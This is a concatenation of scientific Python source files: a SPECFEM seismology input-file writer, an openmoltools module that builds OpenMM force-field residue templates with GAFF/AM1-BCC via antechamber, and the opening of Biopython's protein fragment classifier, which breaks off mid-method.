"MOVIE_WEST_DEG": (-90.0, float, ""),
"MOVIE_EAST_DEG": (90.0, float, ""),
"MOVIE_NORTH_DEG": (90.0, float, ""),
"MOVIE_SOUTH_DEG": (-90.0, float, ""),
"MOVIE_START": (0, int, ""),
"MOVIE_STOP": (40000, int, ""),
# I/O flags.
"SAVE_MESH_FILES": (False, bool, "save mesh files to check the mesh"),
"NUMBER_OF_RUNS": (1, int, "restart files (number of runs can be 1 or "
"higher, choose 1 for no restart files)"),
"NUMBER_OF_THIS_RUN": (1, int, ""),
"LOCAL_PATH": ("./DATABASES_MPI", str,
"path to store the local database files on each node"),
"LOCAL_TMP_PATH": ("./DATABASES_MPI", str,
"temporary wavefield/kernel/movie files"),
"NTSTEP_BETWEEN_OUTPUT_INFO": (1000, int,
"interval at which we output time step "
"info and max of norm of displacement"),
"NTSTEP_BETWEEN_OUTPUT_SEISMOS": (5000000, int,
"interval in time steps for temporary "
"writing of seismograms"),
"NTSTEP_BETWEEN_READ_ADJSRC": (1000, int, ""),
"OUTPUT_SEISMOS_FORMAT": ("SAC_BINARY", str,
"Output format, possible values are 'ASCII',"
"'SAC_ALPHANUM', 'SAC_BINARY', 'ASDF'"),
"ROTATE_SEISMOGRAMS_RT": (False, bool,
"rotate seismograms to Radial-Transverse-Z or "
"use default North-East-Z reference frame"),
"WRITE_SEISMOGRAMS_BY_MASTER": (True, bool,
"decide if master process writes all the "
"seismograms or if all processes do it in "
"parallel"),
"SAVE_ALL_SEISMOS_IN_ONE_FILE": (False, bool,
"save all seismograms in one large "
"combined file instead of one file per "
"seismogram to avoid overloading shared "
"non-local file systems such as GPFS for "
"instance"),
"USE_BINARY_FOR_LARGE_FILE": (False, bool, ""),
"RECEIVERS_CAN_BE_BURIED": (True, bool, "flag to impose receivers at the "
"surface or allow them to be "
"buried"),
"PRINT_SOURCE_TIME_FUNCTION": (False, bool, "Print source time function."),
# adjoint kernel flags
"ANISOTROPIC_KL": (False, bool,
"this parameter must be set to .true. to compute "
"anisotropic kernels in crust and mantle (related to "
"the 21 Cij in geographical coordinates) default is "
".false. to compute isotropic kernels (related to "
"alpha and beta)"),
"SAVE_TRANSVERSE_KL_ONLY": (False, bool,
"output only transverse isotropic kernels "
"(alpha_v,alpha_h,beta_v,beta_h,eta,rho) "
"rather than fully anisotropic kernels when "
"ANISOTROPIC_KL above is set to .true. means "
"to save radial anisotropic kernels, i.e., "
"sensitivity kernels for beta_v, beta_h, "
"etc."),
"APPROXIMATE_HESS_KL": (False, bool,
"output approximate Hessian in crust mantle "
"region. means to save the preconditioning for "
"gradients, they are cross correlations between "
"forward and adjoint accelerations."),
"USE_FULL_TISO_MANTLE": (False, bool,
"forces transverse isotropy for all mantle "
"elements (default is to use transverse isotropy "
"only between MOHO and 220) means we allow "
"radial anisotropy between the bottom of the "
"crust to the bottom of the transition zone, "
"i.e., 660~km depth."),
"SAVE_SOURCE_MASK": (False, bool, "output kernel mask to zero out source "
"region to remove large values near "
"the sources in the sensitivity "
"kernels"),
"SAVE_REGULAR_KL": (False, bool, "output kernels on a regular grid "
"instead of on the GLL mesh points "
"(a bit expensive)"),
"GPU_MODE": (False, bool, "set to true to use GPUs"),
# Adios related settings.
"ADIOS_ENABLED": (False, bool, "set to true to use the ADIOS library for "
"I/Os"),
"ADIOS_FOR_FORWARD_ARRAYS": (True, bool, ""),
"ADIOS_FOR_MPI_ARRAYS": (True, bool, ""),
"ADIOS_FOR_ARRAYS_SOLVER": (True, bool, ""),
"ADIOS_FOR_SOLVER_MESHFILES": (True, bool, ""),
"ADIOS_FOR_AVS_DX": (True, bool, ""),
"ADIOS_FOR_KERNELS": (True, bool, ""),
"ADIOS_FOR_MODELS": (True, bool, ""),
"SOURCE_TIME_FUNCTION":
((), np.array, "If given, it will be used, otherwise it defaults to "
"a Gaussian wavelet")
}
def write(config, events, stations):
"""
Writes input files for SPECFEM3D_CARTESIAN.
Can only simulate one event at a time. If finite fault is present, an error
will be raised.
"""
# Map the output format.
possible_formats = ["ASCII", "SAC_ALPHANUM", "SAC_BINARY", "ASDF"]
f = config.OUTPUT_SEISMOS_FORMAT
if f not in possible_formats:
msg = "Format '%s' is invalid. Possible formats: %s" % (
f, ", ".join(possible_formats))
raise ValueError(msg)
config.OUTPUT_SEISMOS_ASCII_TEXT = False
config.OUTPUT_SEISMOS_SAC_ALPHANUM = False
config.OUTPUT_SEISMOS_SAC_BINARY = False
config.OUTPUT_SEISMOS_ASDF = False
if f == "ASCII":
config.OUTPUT_SEISMOS_ASCII_TEXT = True
elif f == "SAC_ALPHANUM":
config.OUTPUT_SEISMOS_SAC_ALPHANUM = True
elif f == "SAC_BINARY":
config.OUTPUT_SEISMOS_SAC_BINARY = True
elif f == "ASDF":
config.OUTPUT_SEISMOS_ASDF = True
else:
raise NotImplementedError
# Map the source time function.
output_files = {}
if len(config.SOURCE_TIME_FUNCTION):
config.EXTERNAL_SOURCE_TIME_FUNCTION = True
stf = ["%e" % _i for _i in config.SOURCE_TIME_FUNCTION]
output_files["STF"] = "\n".join(stf)
else:
config.EXTERNAL_SOURCE_TIME_FUNCTION = False
    def fbool(value):
        """
        Convert a value to a FORTRAN boolean representation.

        Returns the string ".true." for truthy values and ".false."
        otherwise; used when rendering boolean configuration items into
        the SPECFEM Par_file template.
        """
        if value:
            return ".true."
        else:
            return ".false."
for key, value in config.iteritems():
if isinstance(value, bool):
config[key] = fbool(value)
template_file = os.path.join(os.path.dirname(os.path.abspath(
inspect.getfile(inspect.currentframe()))),
"specfem_globe_cem_par_file.template")
with open(template_file, "rt") as fh:
par_file_template = fh.read()
par_file = par_file_template.format(**config)
# The template for the CMTSOLUTION file.
CMT_SOLUTION_template = (
"PDE {time_year} {time_month} {time_day} {time_hh} {time_mm} "
"{time_ss:.2f} {event_latitude:.5f} {event_longitude:.5f} "
"{event_depth:.5f} {event_mag:.1f} {event_mag:.1f} {event_name}\n"
"event name: 0000000\n"
"time shift: 0.0000\n"
"half duration: {half_duration:.4f}\n"
"latitude: {event_latitude:.5f}\n"
"longitude: {event_longitude:.5f}\n"
"depth:{event_depth: 17.5f}\n"
"Mrr: {mrr:.6g}\n"
"Mtt: {mtt:.6g}\n"
"Mpp: {mpp:.6g}\n"
"Mrt: {mrt:.6g}\n"
"Mrp: {mrp:.6g}\n"
"Mtp: {mtp:.6g}")
# Create the event file.
if len(events) != 1:
msg = ("The SPECFEM backend can currently only deal with a single "
"event.")
raise NotImplementedError(msg)
event = events[0]
# Calculate the moment magnitude
M_0 = 1.0 / math.sqrt(2.0) * math.sqrt(
event["m_rr"] ** 2 +
event["m_tt"] ** 2 +
event["m_pp"] ** 2)
magnitude = 2.0 / 3.0 * math.log10(M_0) - 6.0
lat, lng = (event["latitude"], event["longitude"])
m_rr, m_tt, m_pp, m_rt, m_rp, m_tp = (
event["m_rr"], event["m_tt"], event["m_pp"], event["m_rt"],
event["m_rp"], event["m_tp"])
CMT_SOLUTION_file = CMT_SOLUTION_template.format(
time_year=event["origin_time"].year,
time_month=event["origin_time"].month,
time_day=event["origin_time"].day,
time_hh=event["origin_time"].hour,
time_mm=event["origin_time"].minute,
time_ss=event["origin_time"].second +
event["origin_time"].microsecond / 1E6,
event_mag=magnitude,
event_name=str(event["origin_time"]) + "_" + ("%.1f" % magnitude),
event_latitude=float(lat),
event_longitude=float(lng),
event_depth=float(event["depth_in_km"]),
half_duration=0.0,
# Convert to dyne * cm.
mtt=m_tt * 1E7,
mpp=m_pp * 1E7,
mrr=m_rr * 1E7,
mtp=m_tp * 1E7,
mrt=m_rt * 1E7,
mrp=m_rp * 1E7)
station_parts = []
for station in stations:
station_parts.append(
"{station:s} {network:s} {latitude:.5f} "
"{longitude:.5f} {elev:.1f} {buried:.1f}".format(
network=station["id"].split(".")[0],
station=station["id"].split(".")[1],
latitude=station["latitude"],
longitude=station["longitude"],
elev=station["elevation_in_m"],
buried=station["local_depth_in_m"]))
# Put the files int he output directory.
output_files["Par_file"] = par_file
output_files["CMTSOLUTION"] = CMT_SOLUTION_file
output_files["STATIONS"] = "\n".join(station_parts)
return output_files | KNMI/VERCE | verce-hpc-pe/src/wfs_input_generator/backends/write_SPECFEM3D_GLOBE_CEM.py | Python | mit | 18,012 | [
"Gaussian"
] | 924deca99044b2d2c6e2a6d9101d532d95af203ac27ff6877b63abfd2e0d0e00 |
#!/usr/bin/env python
"""
OpenMM ForceField residue template generators.
"""
from __future__ import absolute_import
import numpy as np
import os, os.path, sys
from simtk.openmm.app import ForceField
from openmoltools.amber import run_antechamber
from openmoltools.openeye import get_charges
from simtk.openmm.app.element import Element
import parmed
if sys.version_info >= (3, 0):
from io import StringIO
from subprocess import getstatusoutput
else:
from cStringIO import StringIO
from commands import getstatusoutput
def generateTopologyFromOEMol(molecule):
    """
    Build an OpenMM Topology mirroring an OEMol molecule.

    The topology contains a single chain with a single residue named after
    the molecule title; one OpenMM atom is created per OEMol atom and one
    bond per OEMol bond.

    Parameters
    ----------
    molecule : openeye.oechem.OEMol
        The molecule from which a Topology object is to be generated.

    Returns
    -------
    topology : simtk.openmm.app.Topology
        The Topology object generated from `molecule`.
    """
    from simtk.openmm.app import Topology
    # A single chain / residue holds the whole small molecule.
    topology = Topology()
    chain = topology.addChain()
    residue = topology.addResidue(molecule.GetTitle(), chain)
    # Mirror every OEMol atom into the topology residue.
    for oe_atom in molecule.GetAtoms():
        topology.addAtom(oe_atom.GetName(),
                         Element.getByAtomicNumber(oe_atom.GetAtomicNum()),
                         residue)
    # Recreate bonds by looking topology atoms up by name.
    name_to_atom = {a.name: a for a in topology.atoms()}
    for oe_bond in molecule.GetBonds():
        topology.addBond(name_to_atom[oe_bond.GetBgn().GetName()],
                         name_to_atom[oe_bond.GetEnd().GetName()])
    return topology
def _ensureUniqueAtomNames(molecule):
    """
    Ensure that every atom in `molecule` has a unique, non-empty name.

    If any duplicate or blank names are found, all atoms are renamed in
    place with Tripos atom names.

    Parameters
    ----------
    molecule : openeye.oechem.OEMol
        The molecule to be modified
    """
    from openeye import oechem
    seen_names = set()
    needs_rename = False
    for atom in molecule.GetAtoms():
        name = atom.GetName()
        if name == "" or name in seen_names:
            needs_rename = True
        seen_names.add(name)
    if needs_rename:
        oechem.OETriposAtomNames(molecule)
def generateOEMolFromTopologyResidue(residue, geometry=False, tripos_atom_names=False):
    """
    Generate an OpenEye OEMol molecule from an OpenMM Topology Residue.

    Parameters
    ----------
    residue : simtk.openmm.app.topology.Residue
        The topology Residue from which an OEMol is to be created.
        An Exception will be thrown if this residue has external bonds.
    geometry : bool, optional, default=False
        If True, will generate a single configuration with OEOmega.
        Note that stereochemistry will be *random*.
    tripos_atom_names : bool, optional, default=False
        If True, will generate and assign Tripos atom names.

    Returns
    -------
    molecule : openeye.oechem.OEMol
        The OEMol molecule corresponding to the topology.
        Atom order will be preserved and bond orders assigned.

    The Antechamber `bondtype` program will be used to assign bond orders, and these
    will be converted back into OEMol bond type assignments.
    Note that there is no way to preserve stereochemistry since `Residue` does
    not note stereochemistry in any way.
    """
    # Raise an Exception if this residue has external bonds.
    if len(list(residue.external_bonds())) > 0:
        raise Exception("Cannot generate an OEMol from residue '%s' because it has external bonds." % residue.name)
    from openeye import oechem
    # Create OEMol where all atoms have bond order 1.
    molecule = oechem.OEMol()
    molecule.SetTitle(residue.name)  # name molecule after the residue
    for atom in residue.atoms():
        oeatom = molecule.NewAtom(atom.element.atomic_number)
        oeatom.SetName(atom.name)
        # Remember the original topology index for downstream users.
        oeatom.AddData("topology_index", atom.index)
    oeatoms = {oeatom.GetName(): oeatom for oeatom in molecule.GetAtoms()}
    for (atom1, atom2) in residue.bonds():
        order = 1
        molecule.NewBond(oeatoms[atom1.name], oeatoms[atom2.name], order)
    # Write out a mol2 file without altering molecule.
    import tempfile
    tmpdir = tempfile.mkdtemp()
    mol2_input_filename = os.path.join(tmpdir, 'molecule-before-bond-perception.mol2')
    ac_output_filename = os.path.join(tmpdir, 'molecule-after-bond-perception.ac')
    ofs = oechem.oemolostream(mol2_input_filename)
    m2h = True
    substruct = False
    oechem.OEWriteMol2File(ofs, molecule, m2h, substruct)
    ofs.close()
    # Run Antechamber bond type perception (-j 2 = full bond types).
    #command = 'bondtype -i %s -o %s -f mol2 -j full' % (mol2_input_filename, ac_output_filename)
    command = 'antechamber -i %s -fi mol2 -o %s -fo ac -j 2' % (mol2_input_filename, ac_output_filename)
    # NOTE(review): status is ignored; an antechamber failure surfaces as an
    # IOError when the .ac file is opened below.
    [status, output] = getstatusoutput(command)
    # Define mapping from GAFF bond orders to OpenEye bond orders.
    order_map = {1: 1, 2: 2, 3: 3, 7: 1, 8: 2, 9: 5, 10: 5}
    # Read the bond orders assigned by antechamber from the BOND records.
    with open(ac_output_filename) as infile:
        lines = infile.readlines()
    antechamber_bond_types = list()
    for line in lines:
        elements = line.split()
        # Guard against blank lines: ''.split() yields an empty list and
        # the original unguarded elements[0] raised IndexError.
        if elements and elements[0] == 'BOND':
            antechamber_bond_types.append(int(elements[4]))
    for (bond, antechamber_bond_type) in zip(molecule.GetBonds(), antechamber_bond_types):
        bond.SetOrder(order_map[antechamber_bond_type])
    # Clean up.
    os.unlink(mol2_input_filename)
    os.unlink(ac_output_filename)
    os.rmdir(tmpdir)
    # Set aromaticity.
    # TODO: Is this necessary?
    oechem.OEClearAromaticFlags(molecule)
    oechem.OEAssignAromaticFlags(molecule, oechem.OEAroModelOpenEye)
    # Generate Tripos atom names if requested.
    if tripos_atom_names:
        oechem.OETriposAtomNames(molecule)
    # Assign a single (random-stereochemistry) conformation if requested.
    if geometry:
        from openeye import oeomega
        omega = oeomega.OEOmega()
        omega.SetMaxConfs(1)
        omega.SetIncludeInput(False)
        omega.SetStrictStereo(False)
        omega(molecule)
    return molecule
def _computeNetCharge(molecule):
    """
    Return the net formal charge of `molecule`.

    Formal charges are (re)assigned to the molecule in place by
    `OEAssignFormalCharges` before being summed.

    Parameters
    ----------
    molecule : openeye.oechem.OEMol
        The molecule for which a net formal charge is to be computed

    Returns
    -------
    net_charge : float
        The net formal charge on the molecule
    """
    from openeye import oechem
    oechem.OEAssignFormalCharges(molecule)
    formal_charges = [a.GetFormalCharge() for a in molecule.GetAtoms()]
    return np.array(formal_charges).sum()
def _writeMolecule(molecule, output_filename):
    """
    Write the molecule to a Tripos mol2 file.

    Parameters
    ----------
    molecule : openeye.oechem.OEMol
        The molecule to write (will be modified by writer).
    output_filename : str
        The filename of the mol2 file to be written.
    """
    from openmoltools.openeye import molecule_to_mol2
    # Write conformer 0 only; the residue name is taken from the molecule title.
    molecule_to_mol2(molecule, tripos_mol2_filename=output_filename, conformer=0, residue_name=molecule.GetTitle())
    # Earlier direct-OpenEye implementation, kept for reference:
    #from openeye import oechem
    #ofs = oechem.oemolostream(output_filename)
    #oechem.OEWriteMolecule(ofs, molecule)
    #ofs.close()
def generateResidueTemplate(molecule, residue_atoms=None):
    """
    Generate a residue template for simtk.openmm.app.ForceField using GAFF/AM1-BCC.
    This requires the OpenEye toolkit.

    Parameters
    ----------
    molecule : openeye.oechem.OEMol
        The molecule to be parameterized.
        The molecule must have explicit hydrogens.
        Net charge will be inferred from the net formal charge on each molecule.
        Partial charges will be determined automatically using oequacpac and canonical AM1-BCC charging rules.
    residue_atoms : set of OEAtom, optional, default=None
        If not None, only the atoms in this set will be used to construct the residue template

    Returns
    -------
    template : simtk.openmm.app.forcefield._TemplateData
        Residue template for ForceField using atom types and parameters from `gaff.xml`.
    additional_parameters_ffxml : str
        Contents of ForceField `ffxml` file defining additional parameters from parmchk(2).

    Notes
    -----
    The residue template will be named after the molecule title.
    This method preserves stereochemistry during AM1-BCC charge parameterization.
    Atom names in molecules will be assigned Tripos atom names if any are blank or not unique.
    """
    # Set the template name based on the molecule title.
    template_name = molecule.GetTitle()
    # Assign Tripos atom names if any are blank or not unique.
    _ensureUniqueAtomNames(molecule)
    # Compute net formal charge.
    net_charge = _computeNetCharge(molecule)
    # Generate canonical AM1-BCC charges and a reference conformation.
    molecule = get_charges(molecule, strictStereo=False, keep_confs=1)
    # DEBUG: This may be necessary.
    molecule.SetTitle('MOL')
    # Create temporary directory for running antechamber.
    import tempfile
    tmpdir = tempfile.mkdtemp()
    prefix = 'molecule'
    input_mol2_filename = os.path.join(tmpdir, prefix + '.tripos.mol2')
    gaff_mol2_filename = os.path.join(tmpdir, prefix + '.gaff.mol2')
    frcmod_filename = os.path.join(tmpdir, prefix + '.frcmod')
    # Write Tripos mol2 file as antechamber input.
    _writeMolecule(molecule, input_mol2_filename)
    # Parameterize the molecule with antechamber.
    run_antechamber(template_name, input_mol2_filename, charge_method=None, net_charge=net_charge, gaff_mol2_filename=gaff_mol2_filename, frcmod_filename=frcmod_filename)
    # Read the resulting GAFF mol2 file back so atoms carry GAFF atom types.
    from openeye import oechem
    ifs = oechem.oemolistream(gaff_mol2_filename)
    ifs.SetFlavor(oechem.OEFormat_MOL2, oechem.OEIFlavor_MOL2_DEFAULT | oechem.OEIFlavor_MOL2_M2H | oechem.OEIFlavor_MOL2_Forcefield)
    oechem.OEReadMolecule(ifs, molecule)
    ifs.close()
    # If residue_atoms is None, use all atoms of the molecule.
    if residue_atoms is None:
        residue_atoms = [atom for atom in molecule.GetAtoms()]
    # Modify partial charges so that the charge on the residue atoms is
    # integral (sums to net_charge); the correction is distributed over the
    # atoms proportionally to the magnitude of their charges.
    residue_charge = 0.0
    sum_of_absolute_charge = 0.0
    for atom in residue_atoms:
        charge = atom.GetPartialCharge()
        residue_charge += charge
        sum_of_absolute_charge += abs(charge)
    excess_charge = residue_charge - net_charge
    if sum_of_absolute_charge == 0.0:
        # Avoid division by zero for an all-zero charge set.
        sum_of_absolute_charge = 1.0
    for atom in residue_atoms:
        charge = atom.GetPartialCharge()
        # BUGFIX: subtract (not add) the proportional share of the excess so
        # the corrected charges sum to net_charge; the original added it,
        # which moved the total further away from integrality.
        atom.SetPartialCharge(charge - excess_charge * (abs(charge) / sum_of_absolute_charge))
    # Create residue template.
    template = ForceField._TemplateData(template_name)
    for (index, atom) in enumerate(molecule.GetAtoms()):
        atomname = atom.GetName()
        typename = atom.GetType()
        element = Element.getByAtomicNumber(atom.GetAtomicNum())
        charge = atom.GetPartialCharge()
        parameters = {'charge': charge}
        atom_template = ForceField._TemplateAtomData(atomname, typename, element, parameters)
        template.atoms.append(atom_template)
    # Internal bonds become template bonds; bonds crossing the residue
    # boundary become external bonds.
    for bond in molecule.GetBonds():
        if (bond.GetBgn() in residue_atoms) and (bond.GetEnd() in residue_atoms):
            template.addBondByName(bond.GetBgn().GetName(), bond.GetEnd().GetName())
        elif (bond.GetBgn() in residue_atoms) and (bond.GetEnd() not in residue_atoms):
            template.addExternalBondByName(bond.GetBgn().GetName())
        elif (bond.GetBgn() not in residue_atoms) and (bond.GetEnd() in residue_atoms):
            template.addExternalBondByName(bond.GetEnd().GetName())
    # Generate ffxml file contents for parmchk-generated frcmod output.
    leaprc = StringIO('parm = loadamberparams %s' % frcmod_filename)
    params = parmed.amber.AmberParameterSet.from_leaprc(leaprc)
    params = parmed.openmm.OpenMMParameterSet.from_parameterset(params)
    ffxml = StringIO()
    params.write(ffxml)
    return template, ffxml.getvalue()
def generateForceFieldFromMolecules(molecules):
    """
    Generate ffxml file contents containing additional parameters and residue
    templates for simtk.openmm.app.ForceField using GAFF/AM1-BCC.
    This requires the OpenEye toolkit.

    Parameters
    ----------
    molecules : list of openeye.oechem.OEMol
        The molecules to be parameterized.
        All molecules must have explicit hydrogens.
        Net charge will be inferred from the net formal charge on each molecule.
        Partial charges will be determined automatically using oequacpac and canonical AM1-BCC charging rules.

    Returns
    -------
    ffxml : str
        Contents of ForceField `ffxml` file defining additional parameters from parmchk(2) and residue templates.

    Notes
    -----
    This method preserves stereochemistry during AM1-BCC charge parameterization.
    Residue template names will be set from molecule names.
    Atom names in molecules will be assigned Tripos atom names if any are blank or not unique.
    """
    # Check template names are unique.
    template_names = set()
    for molecule in molecules:
        template_name = molecule.GetTitle()
        if template_name == '<0>':
            raise Exception("Molecule '%s' has invalid name" % template_name)
        if template_name in template_names:
            raise Exception("Molecule '%s' has template name collision." % template_name)
        template_names.add(template_name)
    # Process molecules in a scratch directory. The chdir is wrapped in
    # try/finally so the working directory is restored even if antechamber
    # or ParmEd raise (the original leaked the chdir on error).
    import tempfile
    tmpdir = tempfile.mkdtemp()
    olddir = os.getcwd()
    os.chdir(tmpdir)
    try:
        leaprc = ""
        for (molecule_index, molecule) in enumerate(molecules):
            # Set the template name based on the molecule title.
            template_name = molecule.GetTitle()
            # Assign Tripos atom names if any are blank or not unique.
            _ensureUniqueAtomNames(molecule)
            # Compute net formal charge.
            net_charge = _computeNetCharge(molecule)
            # Generate canonical AM1-BCC charges and a reference conformation.
            molecule = get_charges(molecule, strictStereo=False, keep_confs=1)
            # Create a unique prefix.
            prefix = 'molecule%010d' % molecule_index
            input_mol2_filename = prefix + '.tripos.mol2'
            gaff_mol2_filename = prefix + '.gaff.mol2'
            frcmod_filename = prefix + '.frcmod'
            # Write Tripos mol2 file as antechamber input.
            _writeMolecule(molecule, input_mol2_filename)
            # Parameterize the molecule with antechamber.
            run_antechamber(prefix, input_mol2_filename, charge_method=None, net_charge=net_charge, gaff_mol2_filename=gaff_mol2_filename, frcmod_filename=frcmod_filename)
            # Append to leaprc input for parmed.
            leaprc += '%s = loadmol2 %s\n' % (prefix, gaff_mol2_filename)
            leaprc += 'loadamberparams %s\n' % frcmod_filename
        # Generate ffxml file contents for parmchk-generated frcmod output.
        leaprc = StringIO(leaprc)
        params = parmed.amber.AmberParameterSet.from_leaprc(leaprc)
        params = parmed.openmm.OpenMMParameterSet.from_parameterset(params)
        ffxml = StringIO()
        params.write(ffxml)
    finally:
        # TODO: Clean up temporary directory contents as well.
        os.chdir(olddir)
    return ffxml.getvalue()
def createStructureFromResidue(residue):
    """
    Create a ParmEd Structure from an OpenMM Topology Residue.

    Atoms without an element are added as parmed.ExtraPoint; all atoms are
    placed in chain 'A' using the residue's own name and index.

    Parameters
    ----------
    residue : simtk.openmm.app.topology.Residue
        The residue to convert.

    Returns
    -------
    structure : parmed.Structure
        Structure containing the residue's atoms and internal bonds.
    """
    # Create ParmEd structure for residue.
    structure = parmed.Structure()
    # BUGFIX: atommap was never initialized in the original (NameError).
    atommap = {}
    for a in residue.atoms():
        if a.element is None:
            atom = parmed.ExtraPoint(name=a.name)
        else:
            atom = parmed.Atom(atomic_number=a.element.atomic_number, name=a.name, mass=a.element.mass)
        structure.add_atom(atom, residue.name, residue.index, 'A')
        atommap[a] = atom
    # BUGFIX: the original iterated an undefined `topology` variable and used
    # an unimported `Bond` class. Use the residue's own bonds and the ParmEd
    # Bond type. NOTE(review): confirm Residue.bonds() is available in the
    # targeted OpenMM version.
    for a1, a2 in residue.bonds():
        structure.bonds.append(parmed.topologyobjects.Bond(atommap[a1], atommap[a2]))
    return structure
def gaffTemplateGenerator(forcefield, residue, structure=None):
    """
    OpenMM ForceField residue template generator for GAFF/AM1-BCC.

    NOTE: This implementation currently only handles small molecules, not polymeric residues.
    NOTE: We presume we have already loaded the `gaff.xml` force definitions into ForceField.

    Parameters
    ----------
    forcefield : simtk.openmm.app.ForceField
        The ForceField object to which residue templates and/or parameters are to be added.
    residue : simtk.openmm.app.Topology.Residue
        The residue topology for which a template is to be generated.

    Returns
    -------
    success : bool
        If the generator is able to successfully parameterize the residue, `True` is returned.
        If the generator cannot parameterize the residue, it should return `False` and not modify `forcefield`.

    Note that there is no way to preserve stereochemistry since `Residue` does not specify stereochemistry in any way.
    Charge fitting is therefore performed on an indeterminate stereo form.
    """
    # Residues with external bonds cannot be parameterized yet.
    if len(list(residue.external_bonds())) > 0:
        return False
    # Build an OEMol from the residue, parameterize it, and register both
    # the template and the extra GAFF parameters with the ForceField.
    oemol = generateOEMolFromTopologyResidue(residue)
    template, ffxml = generateResidueTemplate(oemol)
    forcefield.registerResidueTemplate(template)
    forcefield.loadFile(StringIO(ffxml))
    # Signal successful parameterization.
    return True
class SystemGenerator(object):
    """
    Utility factory that turns Topology objects into OpenMM System objects.

    Parameters
    ----------
    forcefields_to_use : list of string
        List of the names of ffxml files that will be used in system creation.
    forcefield_kwargs : dict of arguments to createSystem, optional
        Allows specification of various aspects of system creation.
    use_gaff : bool, optional, default=True
        If True, will add the GAFF residue template generator.

    Examples
    --------
    >>> from simtk.openmm import app
    >>> forcefield_kwargs={ 'nonbondedMethod' : app.NoCutoff, 'implicitSolvent' : None, 'constraints' : None }
    >>> system_generator = SystemGenerator(['amber99sbildn.xml'], forcefield_kwargs=forcefield_kwargs)
    >>> from openmmtools.testsystems import AlanineDipeptideVacuum
    >>> testsystem = AlanineDipeptideVacuum()
    >>> system = system_generator.createSystem(testsystem.topology)
    """
    def __init__(self, forcefields_to_use, forcefield_kwargs=None, use_gaff=True):
        self._forcefield_xmls = forcefields_to_use
        # An absent kwargs dict is treated as "no extra arguments".
        self._forcefield_kwargs = {} if forcefield_kwargs is None else forcefield_kwargs
        self._forcefield = ForceField(*self._forcefield_xmls)
        if use_gaff:
            # Fall back to GAFF parameterization for residues lacking a template.
            self._forcefield.registerTemplateGenerator(gaffTemplateGenerator)

    def getForceField(self):
        """
        Return the associated ForceField object.

        Returns
        -------
        forcefield : simtk.openmm.app.ForceField
            The current ForceField object.
        """
        return self._forcefield

    def createSystem(self, topology):
        """
        Build a system from the specified topology object.

        Parameters
        ----------
        topology : simtk.openmm.app.Topology object
            The topology of the system to construct.

        Returns
        -------
        system : openmm.System
            A system object generated from the topology
        """
        return self._forcefield.createSystem(topology, **self._forcefield_kwargs)

    @property
    def ffxmls(self):
        """List of ffxml file names used to construct the ForceField."""
        return self._forcefield_xmls

    @property
    def forcefield(self):
        """The underlying simtk.openmm.app.ForceField instance."""
        return self._forcefield
| andrrizzi/openmoltools | openmoltools/forcefield_generators.py | Python | gpl-2.0 | 20,186 | [
"Amber",
"OpenMM"
] | 077626ddf4f98cc2d9a75f8aee52d44dfb4c1cb64b8ffab83691bf8f1ff45e40 |
# Copyright (C) 2002, Thomas Hamelryck (thamelry@binf.ku.dk)
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
import os
import numpy
from Bio.SVDSuperimposer import SVDSuperimposer
from Bio.PDB import *
__doc__="""
Classify protein backbone structure according to Kolodny et al's fragment
libraries. It can be regarded as a form of objective secondary structure
classification. Only fragments of length 5 or 7 are supported (ie. there is a
'central' residue).
Full reference:
Kolodny R, Koehl P, Guibas L, Levitt M.
Small libraries of protein fragments model native protein structures accurately.
J Mol Biol. 2002 323(2):297-307.
The definition files of the fragments can be obtained from:
U{http://csb.stanford.edu/~rachel/fragments/}
You need these files to use this module.
The following example uses the library with 10 fragments of length 5.
The library files can be found in directory 'fragment_data'.
>>> model=structure[0]
>>> fm=FragmentMapper(lsize=10, flength=5, dir="fragment_data")
>>> fm.map(model)
>>> fragment=fm[residue]
"""
# fragment file (lib_SIZE_z_LENGTH.txt)
# SIZE=number of fragments
# LENGTH=length of fragment (4,5,6,7)
_FRAGMENT_FILE="lib_%s_z_%s.txt"
def _read_fragments(size, length, dir="."):
    """
    Read a fragment spec file (available from
    U{http://csb.stanford.edu/rachel/fragments/}
    and return a list of Fragment objects.

    The file interleaves "------" separator rows (each starting a new
    fragment) with rows of C-alpha coordinates; lines starting with "*"
    (comments) and blank lines are skipped.

    @param size: number of fragments in the library
    @type size: int
    @param length: length of the fragments
    @type length: int
    @param dir: directory where the fragment spec files can be found
    @type dir: string
    @return: the fragments read from the spec file
    @rtype: [L{Fragment}, L{Fragment}, ...]
    """
    filename=(dir+"/"+_FRAGMENT_FILE) % (size, length)
    fp=open(filename, "r")
    flist=[]
    # ID of fragment=rank in spec file
    fid=0
    for l in fp.readlines():
        # skip comment and blank lines
        if l[0]=="*" or l[0]=="\n":
            continue
        sl=l.split()
        if sl[1]=="------":
            # Start of fragment definition
            f=Fragment(length, fid)
            flist.append(f)
            # increase fragment id (rank)
            fid+=1
            continue
        # Add CA coord to Fragment
        # NOTE(review): Python 2 map() returns a list here; under Python 3
        # this would need list(map(...)).
        coord=numpy.array(map(float, sl[0:3]))
        # XXX= dummy residue name
        f.add_residue("XXX", coord)
    # NOTE(review): the handle is not closed if an exception occurs above.
    fp.close()
    return flist
class Fragment:
    """
    A polypeptide C-alpha fragment holding a fixed number of residues.
    """
    def __init__(self, length, fid):
        """
        @param length: number of residues in the fragment
        @type length: int
        @param fid: identifier (rank in the library) of the fragment
        @type fid: int
        """
        # Total number of residues this fragment will hold.
        self.length = length
        # Number of residues added so far.
        self.counter = 0
        self.resname_list = []
        # (length x 3) C-alpha coordinate matrix.
        self.coords_ca = numpy.zeros((length, 3), "d")
        self.fid = fid

    def get_resname_list(self):
        """
        @return: the residue names
        @rtype: [string, string,...]
        """
        return self.resname_list

    def get_id(self):
        """
        @return: id for the fragment
        @rtype: int
        """
        return self.fid

    def get_coords(self):
        """
        @return: the CA coords in the fragment
        @rtype: Numeric (Nx3) array
        """
        return self.coords_ca

    def add_residue(self, resname, ca_coord):
        """
        Append one residue to the fragment.

        @param resname: residue name (eg. GLY).
        @type resname: string
        @param ca_coord: the c-alpha coordinates of the residue
        @type ca_coord: Numeric array with length 3
        """
        if self.counter >= self.length:
            raise PDBException("Fragment boundary exceeded.")
        self.resname_list.append(resname)
        self.coords_ca[self.counter] = ca_coord
        self.counter += 1

    def __len__(self):
        """
        @return: length of fragment
        @rtype: int
        """
        return self.length

    def __sub__(self, other):
        """
        Return the RMSD between two fragments after SVD superposition.

        Example:
            >>> rmsd = fragment1 - fragment2

        @return: rmsd between fragments
        @rtype: float
        """
        aligner = SVDSuperimposer()
